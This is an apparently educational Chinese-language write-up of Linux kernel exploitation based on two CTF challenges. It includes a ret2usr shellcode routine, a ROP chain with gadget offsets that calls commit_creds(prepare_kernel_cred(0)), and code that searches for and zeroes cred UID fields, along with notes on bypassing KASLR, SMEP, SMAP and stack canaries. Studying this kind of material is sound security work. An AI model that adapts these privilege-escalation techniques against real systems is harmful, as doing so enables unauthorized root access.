Linux内核态漏洞挖掘与利用技术详解<\/h1>

一、内核漏洞基础<\/h2>

1.1 内核漏洞类型<\/h3>

内核栈溢出漏洞<\/strong><\/p>

由于未正确检查用户输入长度，导致内核栈被覆盖<\/li>
常见于内核模块中的缓冲区操作函数如strcpy<\/code>、memcpy<\/code>等<\/li> <\/ul> <\/li>
堆越界访问漏洞<\/strong><\/p> 内核堆内存操作越界，可能导致信息泄露或任意代码执行<\/li> 包括越界读和越界写两种类型<\/li> <\/ul> <\/li> 空指针解引用<\/strong><\/p> 未正确验证指针有效性导致内核崩溃或权限提升<\/li> <\/ul> <\/li> <\/ol> 1.2 内核防护机制<\/h3> KASLR (内核地址空间布局随机化)<\/strong><\/p> 随机化内核代码和数据的地址，增加利用难度<\/li> <\/ul> <\/li> SMEP (Supervisor Mode Execution Prevention)<\/strong><\/p> 防止内核态执行用户空间代码<\/li> <\/ul> <\/li> SMAP (Supervisor Mode Access Prevention)<\/strong><\/p> 防止内核态访问用户空间内存<\/li> <\/ul> <\/li> Stack Canary<\/strong><\/p> 栈保护机制，检测栈溢出<\/li> <\/ul> <\/li> KPTR_RESTRICT<\/strong><\/p> 限制通过\/proc\/kallsyms<\/code>泄露内核符号地址<\/li> <\/ul> <\/li> <\/ol> 二、QWB2018 Core题目分析<\/h2> 2.1 环境准备<\/h3> 文件结构<\/strong><\/p> start.sh # qemu启动脚本 core.cpio # 文件系统 bzImage # 内核镜像 core.ko # 存在漏洞的内核模块 <\/code><\/pre> <\/li> 启动参数修改<\/strong><\/p> 修改start.sh<\/code>中的内存参数为512M<\/li> 删除init<\/code>文件中的poweroff<\/code>指令防止自动关机<\/li> <\/ul> <\/li> <\/ol> 2.2 漏洞分析<\/h3> 核心漏洞函数<\/strong><\/p> core_read<\/code>: 可控全局变量off<\/code>导致内核信息泄露<\/li> core_copy_func<\/code>: 有符号整数比较问题导致栈溢出<\/li> <\/ul> <\/li> 防护检查<\/strong><\/p> CANARY: ENABLED NX: ENABLED PIE: disabled <\/code><\/pre> <\/li> 利用思路<\/strong><\/p> 通过core_read<\/code>泄露栈canary和返回地址<\/li> 通过core_copy_func<\/code>触发栈溢出<\/li> 构造ROP链或执行shellcode提权<\/li> <\/ul> <\/li> <\/ol> 2.3 漏洞利用方法<\/h3> 方法1: 直接执行Shellcode<\/h4> 利用条件<\/strong><\/p> 内核未开启SMEP\/SMAP<\/li> 能够泄露canary和返回地址<\/li> <\/ul> <\/li> 利用步骤<\/strong><\/p> 构造payload覆盖返回地址为shellcode地址<\/li> shellcode中执行commit_creds(prepare_kernel_cred(0))<\/code><\/li> 修复栈帧并跳回原返回地址<\/li> <\/ul> <\/li> 关键代码<\/strong><\/p> void<\/span> poc1_shellcode<\/span>() { <\/span><\/span> int<\/span>*<\/span>(*<\/span>userPrepare_kernel_cred)(int<\/span>) =<\/span> prepare_kernel_cred; <\/span><\/span> void<\/span>*<\/span>(*<\/span>userCommit_cred)(int<\/span>*<\/span>) =<\/span> commit_creds; <\/span><\/span> (*<\/span>userCommit_cred)((*<\/span>userPrepare_kernel_cred)(0<\/span>)); <\/span><\/span> asm<\/span>("mov %rbp,%rsp"<\/span>); \/\/ 修复栈帧 <\/span><\/span><\/span><\/span> asm<\/span>("pop %rbp"<\/span>); <\/span><\/span> asm<\/span>("mov %0,%%rax; jmp %%rax;"<\/span>::<\/span>"r"<\/span>(ret_addr):<\/span>"%rax"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 方法2: ROP链利用<\/h4> 利用条件<\/strong><\/p> 内核开启SMEP\/SMAP<\/li> 能够泄露内核基址和canary<\/li> <\/ul> <\/li> ROP链构造<\/strong><\/p> 查找内核中的gadgets: pop rdi; ret<\/code><\/li> mov rdi, rax; call rcx<\/code><\/li> swapgs; popfq; ret<\/code><\/li> iretq<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> 完整ROP流程<\/strong><\/p> 1. prepare_kernel_cred(0) 2. 将结果赋给rdi 3. commit_creds 4. swapgs 5. iret返回到用户态 <\/code><\/pre> <\/li> 关键代码<\/strong><\/p> u64 Rop[0x100<\/span>] =<\/span> { <\/span><\/span> 0x90<\/span>, 0x90<\/span>, 0x90<\/span>, 0x90<\/span>, 0x90<\/span>, 0x90<\/span>, 0x90<\/span>, 0x90<\/span>, <\/span><\/span> canary, 0<\/span>, <\/span><\/span> 0xFFFFFFFF81126515<\/span> -<\/span> kerneloff, \/\/ pop rdi;ret <\/span><\/span><\/span><\/span> 0<\/span>, <\/span><\/span> prepare_kernel_cred, <\/span><\/span> 0xFFFFFFFF8186EB33<\/span> -<\/span> kerneloff, \/\/ pop rcx;ret <\/span><\/span><\/span><\/span> 0xFFFFFFFF810A0F49<\/span> -<\/span> kerneloff, \/\/ pop rdx;ret <\/span><\/span><\/span><\/span> 0xFFFFFFFF81623D0B<\/span> -<\/span> kerneloff, \/\/ mov rdi,rax;call rcx <\/span><\/span><\/span><\/span> commit_creds, <\/span><\/span> 0xffffffff81a012da<\/span> -<\/span> kerneloff, \/\/ swapgs;popfq;ret <\/span><\/span><\/span><\/span> 0<\/span>, <\/span><\/span> 0xFFFFFFFF81050AC2<\/span> -<\/span> kerneloff, \/\/ iretq <\/span><\/span><\/span><\/span> &<\/span>execshell, <\/span><\/span> user_cs, <\/span><\/span> user_rflags, <\/span><\/span> user_sp, <\/span><\/span> user_ss <\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 三、0ctf-zerofs题目分析<\/h2> 3.1 文件系统基础<\/h3> Linux文件系统架构<\/strong><\/p> 虚拟文件系统(VFS): 统一接口层<\/li> 具体文件系统: 实现具体操作<\/li> <\/ul> <\/li> 关键数据结构<\/strong><\/p> super_block<\/code>: 文件系统超级块<\/li> inode<\/code>: 文件索引节点<\/li> dentry<\/code>: 目录项<\/li> <\/ul> <\/li> <\/ol> 3.2 漏洞分析<\/h3> 漏洞位置<\/strong><\/p> zerofs_read<\/code>: 文件大小设置为-1时可越界读<\/li> zerofs_write<\/code>: 无边界检查导致越界写<\/li> <\/ul> <\/li> 利用思路<\/strong><\/p> 通过越界读搜索进程cred结构<\/li> 通过越界写修改cred中的UID\/GID为0<\/li> <\/ul> <\/li> <\/ol> 3.3 cred结构提权<\/h3> cred结构关键字段<\/strong><\/p> struct<\/span> cred { <\/span><\/span> atomic_t usage; <\/span><\/span> kuid_t uid; \/\/ 真实用户ID <\/span><\/span><\/span><\/span> kgid_t gid; \/\/ 真实组ID <\/span><\/span><\/span><\/span> kuid_t suid; \/\/ 保存的用户ID <\/span><\/span><\/span><\/span> kgid_t sgid; \/\/ 保存的组ID <\/span><\/span><\/span><\/span> kuid_t euid; \/\/ 有效用户ID <\/span><\/span><\/span><\/span> kgid_t egid; \/\/ 有效组ID <\/span><\/span><\/span><\/span> kuid_t fsuid; \/\/ 文件系统用户ID <\/span><\/span><\/span><\/span> kgid_t fsgid; \/\/ 文件系统组ID <\/span><\/span><\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> 定位cred结构<\/strong><\/p> 普通用户进程的cred中UID\/GID等字段值为1000(0x3e8)<\/li> 通过越界读搜索连续多个0x3e8值的内存区域<\/li> <\/ul> <\/li> 修改cred字段<\/strong><\/p> 将找到的cred结构中的关键ID字段修改为0<\/li> <\/ul> <\/li> 关键代码<\/strong><\/p> if<\/span>(buf[i] ==<\/span> current_uid &&<\/span> buf[i+<\/span>6<\/span>] ==<\/span> current_uid <\/span><\/span> &&<\/span> buf[i+<\/span>7<\/span>] ==<\/span> current_uid &&<\/span> buf[i+<\/span>12<\/span>] ==<\/span> current_uid <\/span><\/span> &&<\/span> buf[i+<\/span>24<\/span>] ==<\/span> current_uid &&<\/span> buf[i+<\/span>25<\/span>] ==<\/span> current_uid <\/span><\/span> &&<\/span> buf[i+<\/span>34<\/span>] ==<\/span> current_uid &&<\/span> buf[i+<\/span>39<\/span>] ==<\/span> current_uid) { <\/span><\/span> buf[i] =<\/span> 0<\/span>; buf[i+<\/span>6<\/span>] =<\/span> 0<\/span>; buf[i+<\/span>7<\/span>] =<\/span> 0<\/span>; <\/span><\/span> buf[i+<\/span>12<\/span>] =<\/span> 0<\/span>; buf[i+<\/span>24<\/span>] =<\/span> 0<\/span>; buf[i+<\/span>25<\/span>] =<\/span> 0<\/span>; <\/span><\/span> buf[i+<\/span>34<\/span>] =<\/span> 0<\/span>; buf[i+<\/span>39<\/span>] =<\/span> 0<\/span>; <\/span><\/span> return<\/span> 1<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 四、高级技巧与注意事项<\/h2> 4.1 内核调试技巧<\/h3> 提取vmlinux<\/strong><\/p> extract-vmlinux .\/bzImage > vmlinux <\/span><\/span><\/code><\/pre><\/li> 提取gadgets<\/strong><\/p> ropper --file .\/vmlinux --nocolor > gadgets <\/span><\/span><\/code><\/pre><\/li> 调试符号处理<\/strong><\/p> 注意内核可能使用randstruct<\/code>插件随机化结构体布局<\/li> <\/ul> <\/li> <\/ol> 4.2 绕过防护机制<\/h3> 绕过KASLR<\/strong><\/p> 通过信息泄露获取内核基址<\/li> 利用\/tmp\/kallsyms<\/code>获取符号地址<\/li> <\/ul> <\/li> 绕过SMEP\/SMAP<\/strong><\/p> 使用纯ROP链利用<\/li> 避免直接执行用户空间代码<\/li> <\/ul> <\/li> 绕过Stack Canary<\/strong><\/p> 通过信息泄露获取canary值<\/li> 在溢出时保持canary不变<\/li> <\/ul> <\/li> <\/ol> 4.3 稳定性提升<\/h3> cred搜索优化<\/strong><\/p> 扩大搜索范围<\/li> 多次尝试不同偏移<\/li> <\/ul> <\/li> 错误处理<\/strong><\/p> 检查系统调用返回值<\/li> 添加异常处理逻辑<\/li> <\/ul> <\/li> <\/ol> 五、总结<\/h2> 内核漏洞利用需要结合具体漏洞类型和防护机制制定利用策略，核心要点包括：<\/p> 准确识别漏洞类型和可利用点<\/li> 处理各种内核防护机制(KASLR, SMEP, SMAP等)<\/li> 灵活运用信息泄露、ROP构造、cred修改等技术<\/li> 注意利用稳定性和兼容性问题<\/li> <\/ol> 通过系统学习内核漏洞原理和利用技术，可以有效提升内核安全研究和防护能力。<\/p>